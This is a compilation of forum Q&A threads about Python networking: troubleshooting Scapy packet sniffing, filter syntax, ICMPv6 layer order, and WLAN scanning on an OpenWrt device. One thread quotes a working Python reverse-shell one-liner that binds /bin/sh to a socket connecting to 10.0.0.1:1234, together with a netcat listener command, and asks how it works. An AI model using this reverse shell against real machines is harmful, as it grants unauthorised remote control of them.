I've been following Seitz's black hat python book and he gives an example of capturing network traffic using the scapy library.
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
def packet_callback(packet):
print packet.show()
sniff(filter="",iface="any",prn=packet_callback, count = 1)
I run the above function as follows: sudo python sniffer.py and open google chrome to a page. No packets get captured. I do a ping request to a domain and nothing gets captured. I was expecting the print packet.show() line to print the first packet being sent.
All of this is being run on a Macbook Pro on a wireless internet connection.
Can someone help me troubleshoot?
if you want scapy to sniff on all interfaces, just remove the iface = "any" parameter. Since "any" is not an interface therefore scapy cannot sniff.
Also remove the filter parameter since it is not applying any filter.
The correct command would like like this.
sniff(prn=packet_callback, count = 1)
iface argument expects exact name of the interface. Most likely you do not have an interface named ANY. You can omit the argument, which is most likely what you have to do in this case, or use actual interface name (such as "eth0").
I actually get an exception "No such device", when I try your code. Is this the actual code you run?
Also, please, write scapy version. I am using python3 version, which you can get from http://github.com/phaethon/scapy or as scapy-python3.
Related
I am trying to write a code in python that sniffing packets in my computer and printing those that are dns ones. but for some reason I keep getting this error.
this is my code:
from scapy.all import *
from scapy.layers.dns import DNS, DNSQR
from scapy.layers.inet import IP, UDP
def print_packets(pkg):
if DNS in pkg:
pkg.show()
def is_dns(pkg):
if "DNS Resource Record" in pkg:
return DNS
return False
def main():
packets = sniff(filter=is_dns, prn=print_packets)
if __name__ == "__main__":
main()
can someone tell me why it's happening and how can I fix it?
why it's happening?
You appear to be encountering a permission error.
That is, the sniff( ... ) call is quite standard,
and the subsequent request for ETH_P_ALL is what you want.
But you seem to lack permission to see such interfaces.
how can I fix it?
Note that the intro / install docs always take care
to specify UID=0 root access, e.g. $ sudo ./run_scapy.
On your platform I'm not sure what exactly it takes
to convince the ether API that you're a legitimate admin.
Follow the docs:
the latest version of Scapy supports Windows out-of-the-box.
If really nothing seems to work, consider skipping the Windows version and using Scapy from a Linux Live CD ...
You may not be able to capture WLAN traffic on Windows ....
If you believe a response is an answer to your question,
it is appropriate to accept it.
Consider:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
So this is a Python reverse shell one-liner and can be found easily just by googling it. To better understanding this, let's write it in multi-line:
1# import socket,subprocess,os
2# s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
3# s.connect(("10.0.0.1",1234))
4# os.dup2(s.fileno(),0)
5# os.dup2(s.fileno(),1)
6# os.dup2(s.fileno(),2)
7# p=subprocess.call(["/bin/sh","-i"])
Most parts of this is pretty easy to understand. In the first line, we import necessary modules. In the second line we make a socket object using the IPv4 family and TCP protocol. Line Three is where we connect to our server (attacker machine) and in line 4, 5, and 6, we duplicate the socket file descriptor as 0 (standard input), 1 (standard output), and 2 (standard error) (I can be wrong here). In the end, we start the bin/sh shell in interactive mode.
This is working fine. All we need is just to change the IP address and port to connect, and in the other end (server) we need to listen for an incoming connection and it can be done easily using netcat:
nc -nlvp 1234
I just don't understand after establishing the reverse shell, how this client machine (the machine that we run the Python reverse shell one-liner on it) can send the output of commands that it received from the server. I mean, there aren’t any send() or recv() method.
I tried to write a server myself using Python, but it does not work properly and I can't receive the output of my commands.
(But here's a Python reverse shell that I have been coded, and it works fine: https://github.com/ramixix/Python_Reverse_Shell.git. I’d be happy if you check it out.)
How does it work and how can I write a server for it?
A friend and I are currently making a sniffing application in Python using the Scapy library. We have a GUI interface where we can choose filters and protocols. We want to sniff the network using one or more filters but don't know how to do. For now we tried the following code :
capture=scapy.sniff(filter="tcp and udp",timeout=5)
print(capture)
It works well but it sniffs using only the first filter (tcp filter in this case). We also tried with the following code but same :
capture1=scapy.sniff(filter="tcp",timeout=5)
capture2=scapy.sniff(filter="udp",timeout=5)
print(capture1)
print(capture2)
So, is it possible to sniff using more than one filter and if so, do you have any idea ?
Thanks
You are telling Scapy to sniff packets that are both TCP and UDP.
When I try this (Linux, current Scapy development version), I get a warning message tcpdump: expression rejects all packets and the filter is not applied.
You probably want to use a or instead of and: capture=scapy.sniff(filter="tcp or udp",timeout=5).
The thing I am trying to achive, I want my android app to get a list of all available wlan connections within the range of a device with a wlan (at that point the device is an access point). Then I want to tell that device to which network to connect. So far so good.
I am trying to access the wlan module on my openwert device via python. I am using this [1] python module. When I execute the following example code
python iwlist.py wlan0 scanning
i get the error
Interface does not support scanning
Then I started to dig inside of the code, and the real error message is this one:
Argument list too long
and this error is comming from the module (from the file iwlibs.py). The exact code snippet (class Iwrange, update()) where it is comming from :
buff, s = iwstruct.pack_wrq(640)
print "Now comes the error"
status, result = iwstruct.iw_get_ext(self.ifname,
pythonwifi.flags.SIOCGIWRANGE,
data=s)
I dont know if it is of any help, but I also checked the buff variable and it just says 0x00 (I guess there should be some other stuff too bcz it is indicating some address in the memory, but of course I could be wrong too and the buffer is just being initialized there).
So, I am not sure what the problem is, it seems to me, maybe, that the reserver space (or buffer?) is too small for the stuff that is being returnd.
Does anybody know what else I could try in order to get this working ?
And one more thing, I also downloaded wireless_tools and now I can use iwlist. I can also scan and get the list of all surrounding wlan networks. So it seems the hardware is working fine, I am just not accessing it properly with python
[1] https://pypi.python.org/pypi/python-wifi/0.6.1
Just as an info, i solved my issue by changing the module I have been using. Now I am using [1]. When I execute this code
from wifi import Cell, Scheme
print "%s" %(Cell.all('wlan0'))
I get a list with all surrounding networks. Then I have just to choose one of them (by the SSID) and make my connection
[1]https://wifi.readthedocs.io/en/latest/
I am trying to send an ICMPv6 Echo Request from within a python script. When I do this process out within the Scapy environment, it works perfectly. I can see the packet exchanges within Wireshark. However, when I have this code:
#Spacy commands
ip = IPv6()
ip.dst = "fe80::ba8d:12ff:fe42:98c8"
ip.show()
print'-----------------------------------------'
request = ICMPv6EchoRequest()
request.id=98
request.show()
print'-----------------------------------------\n'
send(request/ip) #send Echo Request w/ IPv6 Header
in my python script and then call the script, I get this:
WARNING: Mac address to reach destination not found. Using broadcast.
WARNING: No IPv6 underlayer to compute checksum. Leaving null.
.
Sent 1 packets.
But no packet is actually sent... does anyone have any idea what I'm doing wrong?
EDIT: I should have mentioned that the sending node is a Virtual Ubuntu Linux Machine and the attempted Receiver is a Macbook on a bridged network adapter.
In Scapy, when you use the / operator the operand on the left encapsulates or places the operand on the right as it's data, or underlayer. It's what will come next in the packet.
Your problem is your sending line -
send(request/ip)
You have them reversed. This produces a packet where the IP Layer is the data of the ICMPv6 layer. This is why you are getting the error WARNING: No IPv6 underlayer to compute checksum. Leaving null, because you aren't actually putting anything there since your layers are in the wrong order.
This is what you meant to do.
send(ip/request)
Changing that one send line and you should see the results you expect.